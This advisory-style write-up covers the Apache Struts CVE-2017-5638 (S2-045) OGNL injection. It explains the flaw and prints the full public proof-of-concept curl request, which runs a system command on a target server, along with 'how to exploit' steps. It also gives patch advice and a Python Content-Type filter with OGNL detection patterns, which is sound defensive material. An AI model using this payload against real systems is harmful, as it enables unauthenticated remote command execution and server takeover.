How the mentioned CVE works:
CVE-2017-5638 resides in the Jakarta Multipart parser of Apache Struts 2, the default value of `struts.multipart.parser`. Struts hands any incoming request whose `Content-Type` header contains the substring `multipart/form-data` to that parser. If the header is not actually a valid multipart media type, the underlying Apache Commons FileUpload library throws an exception whose message embeds the raw header value. Struts then builds the user-facing error message from that text via `LocalizedTextUtil.findText`, which treats `%{...}` sequences in the message as Object-Graph Navigation Language (OGNL) and evaluates them. An attacker therefore sends a `Content-Type` value that contains `multipart/form-data` only as a string literal inside an OGNL expression: the parser rejects the header, the error path evaluates the expression, and the OGNL runs with the privileges of the application, which is enough to spawn a process and execute arbitrary commands on the underlying server. No authentication is required, and the vulnerable code runs while the request is being wrapped, before any action executes, so application-level access controls never see the request.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch available.
What Undercode Say:
The public proof-of-concept request: the `Content-Type` value is an OGNL expression that disables the sandbox (`DEFAULT_MEMBER_ACCESS`, or clears the excluded classes and packages on older versions), runs the command held in `#cmd` (here `id`) through `ProcessBuilder`, and copies the command's output into the HTTP response so the result is visible in the reply.
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action
How to exploit:
Craft a `Content-Type` header that carries the literal string `multipart/form-data` inside an OGNL `%{...}` expression. Send it in any HTTP request (GET is enough; no request body is needed) to any URL handled by the Struts filter on a vulnerable instance, not only file-upload actions. The multipart error path evaluates the expression and the embedded system command runs; with the request above, the output of `id` comes back in the HTTP response.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1, which stop passing the raw multipart error text through OGNL evaluation. If an immediate upgrade is not possible, the Apache advisory (S2-045) describes a workaround: deploy a Servlet filter in front of Struts that validates the `Content-Type` header and drops requests whose value is not a well-formed `multipart/form-data` media type. WAF rules that match OGNL syntax (`%{`, `${`, `@Class@member`) in request headers add defence in depth, but they are signature-based and can be evaded, so treat them as a stop-gap rather than a fix. To confirm exposure, check the version in the `struts2-core-*.jar` name under `WEB-INF/lib`, and remember that the vulnerable path is reachable on every action, not just upload endpoints.
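The Servlet-filter workaround described above, written out as an added example (not code from the original post or from the Struts project) in Python so it can be run offline and adapted. It encodes the trigger condition from the description of the flaw: Struts routes any request whose Content-Type contains the substring multipart/form-data to the Jakarta parser, so such a header is accepted only if it is an exactly well-formed multipart/form-data media type with a boundary parameter, and OGNL delimiters anywhere in the header are rejected outright. The function names, the parsing helper and every sample header value (including the abbreviated PoC-shaped one) are constructed for this example.

```python
from __future__ import annotations

import re

# Added example, not code from the original post or from Apache Struts. It models
# the Servlet-filter workaround published for S2-045: validate Content-Type before
# the request can reach the multipart parser. All sample headers are constructed.

# RFC 7230 token characters (media type names, parameter names, unquoted values).
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_MEDIA_TYPE_RE = re.compile(r"^(" + _TOKEN + r")/(" + _TOKEN + r")")
_PARAM_RE = re.compile(r'\s*;\s*(' + _TOKEN + r')=(?:"([^"]*)"|(' + _TOKEN + r'))')

# Coarse OGNL signatures: expression delimiters and static member access.
# This is the signature layer; the structural check below is the real defence.
_OGNL_MARKERS = re.compile(r"%\{|\$\{|@[\w.]+@")


def parse_content_type(value: str) -> tuple[str, dict[str, str]] | None:
    """Parse 'type/subtype; name=value; ...'. Returns None if not well formed."""
    value = value.strip()
    m = _MEDIA_TYPE_RE.match(value)
    if not m:
        return None
    media_type = (m.group(1) + "/" + m.group(2)).lower()
    params: dict[str, str] = {}
    pos = m.end()
    while pos < len(value):
        pm = _PARAM_RE.match(value, pos)
        if not pm:
            return None  # anything that is not a ';name=value' parameter is garbage
        params[pm.group(1).lower()] = pm.group(2) if pm.group(2) is not None else pm.group(3)
        pos = pm.end()
    return media_type, params


def check_content_type(value: str | None) -> tuple[bool, str]:
    """Return (allowed, reason) for one request's Content-Type header.

    Struts 2 hands any request whose Content-Type *contains* 'multipart/form-data'
    to the Jakarta parser; that parser rejects anything that is not a real multipart
    media type with an error message embedding the raw header, which is the S2-045
    OGNL sink. So a header containing that substring must be exactly well formed.
    """
    if value is None:
        return True, "no Content-Type"
    if _OGNL_MARKERS.search(value):
        return False, "OGNL expression syntax in Content-Type"
    if "multipart/form-data" not in value.lower():
        return True, "not routed to the multipart parser"
    parsed = parse_content_type(value)
    if parsed is None:
        return False, "malformed Content-Type would reach the multipart parser"
    media_type, params = parsed
    if media_type != "multipart/form-data":
        return False, "media type is not exactly multipart/form-data"
    if not params.get("boundary"):
        return False, "multipart/form-data without a boundary parameter"
    return True, "well-formed multipart/form-data"


# Constructed sample headers. "poc" is an abbreviated copy of the public PoC shape:
# it contains 'multipart/form-data' (so Struts wraps the request) but is not a
# valid media type, and it carries an OGNL expression.
SAMPLE_HEADERS = {
    "poc": "%{(#_='multipart/form-data').(#cmd='id')}",
    "upload": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "json": "application/json; charset=utf-8",
    "smuggled_param": 'multipart/form-data; boundary=x; charset="${oops}"',
    "prefix_junk": "xmultipart/form-data; boundary=abc",
    "no_boundary": "multipart/form-data",
}

if __name__ == "__main__":
    for name, header in SAMPLE_HEADERS.items():
        allowed, reason = check_content_type(header)
        print(f"{name:15} {'ALLOW' if allowed else 'BLOCK':5} {reason}")
```

The "prefix_junk" case is the reason the structural check matters: it contains no OGNL marker, yet Struts would still route it to the multipart parser and the parser would reject it with an error message containing the header, so a filter that only greps for `%{` would let the dangerous code path run. Port the same logic into a `javax.servlet.Filter` mapped before the Struts filter if you deploy this on a real instance.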
Impact:
Complete server compromise: unauthenticated remote command execution as the user running the servlet container, and through it access to any data, credentials or internal services the application can reach.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

